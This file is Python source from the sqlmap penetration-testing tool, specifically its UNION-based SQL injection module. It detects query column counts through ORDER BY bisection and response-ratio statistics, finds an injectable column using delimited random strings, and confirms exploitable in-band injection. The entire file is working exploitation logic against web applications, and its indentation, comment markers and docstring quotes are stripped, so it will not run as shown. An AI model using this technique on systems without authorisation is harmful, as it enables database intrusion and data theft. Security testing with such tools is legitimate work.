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#!/usr/bin/env python
Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/)
See the file 'doc/COPYING' for copying permission
import random
import re
from lib.core.agent import agent
from lib.core.common import average
from lib.core.common import Backend
from lib.core.common import isNullValue
from lib.core.common import listToStrValue
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import removeReflectiveValues
from lib.core.common import singleTimeLogMessage
from lib.core.common import singleTimeWarnMessage
from lib.core.common import stdev
from lib.core.common import wasLastRequestDBMSError
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import PAYLOAD
from lib.core.settings import FROM_DUMMY_TABLE
from lib.core.settings import UNION_MIN_RESPONSE_CHARS
from lib.core.settings import UNION_STDEV_COEFF
from lib.core.settings import MIN_RATIO
from lib.core.settings import MAX_RATIO
from lib.core.settings import MIN_STATISTICAL_RANGE
from lib.core.settings import MIN_UNION_RESPONSES
from lib.core.settings import ORDER_BY_STEP
from lib.core.unescaper import unescaper
from lib.request.comparison import comparison
from lib.request.connect import Connect as Request
def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL):
Finds number of columns affected by UNION based injection
retVal = None
def __orderByTechnique():
def __orderByTest(cols):
query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix)
query = agent.suffixQuery(query, suffix=suffix, comment=comment)
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
return not re.search(r"(warning|error|order by)", page or "", re.I) and comparison(page, headers)
if __orderByTest(1) and not __orderByTest(randomInt()):
infoMsg = "ORDER BY technique seems to be usable. "
infoMsg += "This should reduce the time needed "
infoMsg += "to find the right number "
infoMsg += "of query columns. Automatically extending the "
infoMsg += "range for current UNION query injection technique test"
lowCols, highCols = 1, ORDER_BY_STEP
found = None
while not found:
if __orderByTest(highCols):
lowCols = highCols
highCols += ORDER_BY_STEP
while not found:
mid = highCols - (highCols - lowCols) / 2
if __orderByTest(mid):
lowCols = mid
highCols = mid
if (highCols - lowCols) < 2:
found = lowCols
return found
items, ratios = [], []
kb.errorIsNone = False
lowerCount, upperCount = conf.uColsStart, conf.uColsStop
if lowerCount == 1:
found = kb.orderByColumns or __orderByTechnique()
if found:
kb.orderByColumns = found
infoMsg = "target url appears to have %d columns in query" % found
return found
if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES:
upperCount = lowerCount + MIN_UNION_RESPONSES
min_, max_ = MAX_RATIO, MIN_RATIO
pages = {}
for count in xrange(lowerCount, upperCount+1):
query = agent.forgeInbandQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
if not isNullValue(kb.uChar):
pages[count] = page
ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO
min_, max_ = min(min_, ratio), max(max_, ratio)
items.append((count, ratio))
if not isNullValue(kb.uChar):
for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar):
contains = [(count, re.search(regex, page or "", re.IGNORECASE) is not None) for count, page in pages.items()]
if len(filter(lambda x: x[1], contains)) == 1:
retVal = filter(lambda x: x[1], contains)[0][0]
if not retVal:
minItem, maxItem = None, None
for item in items:
if item[1] == min_:
minItem = item
elif item[1] == max_:
maxItem = item
if all(map(lambda x: x == min_ and x != max_, ratios)):
retVal = maxItem[0]
elif all(map(lambda x: x != min_ and x == max_, ratios)):
retVal = minItem[0]
elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE:
deviation = stdev(ratios)
lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation
if min_ < lower:
retVal = minItem[0]
if max_ > upper:
if retVal is None or abs(max_ - upper) > abs(min_ - lower):
retVal = maxItem[0]
kb.errorIsNone = popValue()
if retVal:
infoMsg = "target url appears to be UNION injectable with %d columns" % retVal
return retVal
def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL):
validPayload = None
vector = None
positions = range(0, count)
# Unbiased approach for searching appropriate usable column
# For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test it the target url is
# affected by an exploitable inband SQL injection vulnerability
for position in positions:
# Prepare expression with delimiters
randQuery = randomStr(UNION_MIN_RESPONSE_CHARS)
phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop)
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
randQueryUnescaped = unescaper.unescape(randQueryProcessed)
# Forge the inband SQL injection request
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
if content and phrase in content:
validPayload = payload
vector = (position, count, comment, prefix, suffix, kb.uChar, where, content.count(phrase) > 1)
# Prepare expression with delimiters
randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS)
phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop)
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)
# Confirm that it is a full inband SQL injection
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")
if not all(_ in content for _ in (phrase, phrase2)):
vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE)
unionErrorCase = kb.errorIsNone and wasLastRequestDBMSError()
if unionErrorCase and count > 1:
warnMsg = "combined UNION/error-based SQL injection case found on "
warnMsg += "column %d. sqlmap will try to find another " % (position + 1)
warnMsg += "column with better characteristics"
return validPayload, vector
def __unionConfirm(comment, place, parameter, prefix, suffix, count):
validPayload = None
vector = None
# Confirm the inband SQL injection and get the exact column
# position which can be used to extract data
validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count)
# Assure that the above function found the exploitable full inband
# SQL injection position
if not validPayload:
validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE)
return validPayload, vector
def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):
This method tests if the target url is affected by an inband
SQL injection vulnerability. The test is done up to 50 columns
on the target database table
validPayload = None
vector = None
# In case that user explicitly stated number of columns affected
if conf.uColsStop == conf.uColsStart:
count = conf.uColsStart
count = __findUnionCharCount(comment, place, parameter, value, prefix, suffix, PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE)
if count:
validPayload, vector = __unionConfirm(comment, place, parameter, prefix, suffix, count)
if not all([validPayload, vector]) and not all([conf.uChar, conf.dbms]):
warnMsg = "if UNION based SQL injection is not detected, "
warnMsg += "please consider "
if not conf.uChar and count > 1:
message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] "
test = readInput(message, default="Y")
if test[0] not in ("y", "Y"):
warnMsg += "usage of option '--union-char' "
warnMsg += "(e.g. --union-char=1) "
kb.uChar = str(randomInt(2))
validPayload, vector = __unionConfirm(comment, place, parameter, prefix, suffix, count)
if not conf.dbms:
if not conf.uChar:
warnMsg += "and/or try to force the "
warnMsg += "forcing the "
warnMsg += "back-end DBMS (e.g. --dbms=mysql) "
if not all([validPayload, vector]) and not warnMsg.endswith("consider "):
return validPayload, vector
def unionTest(comment, place, parameter, value, prefix, suffix):
This method tests if the target url is affected by an inband
SQL injection vulnerability. The test is done up to 3*50 times
if conf.direct:
validPayload, vector = __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
if validPayload:
validPayload = agent.removePayloadDelimiters(validPayload)
return validPayload, vector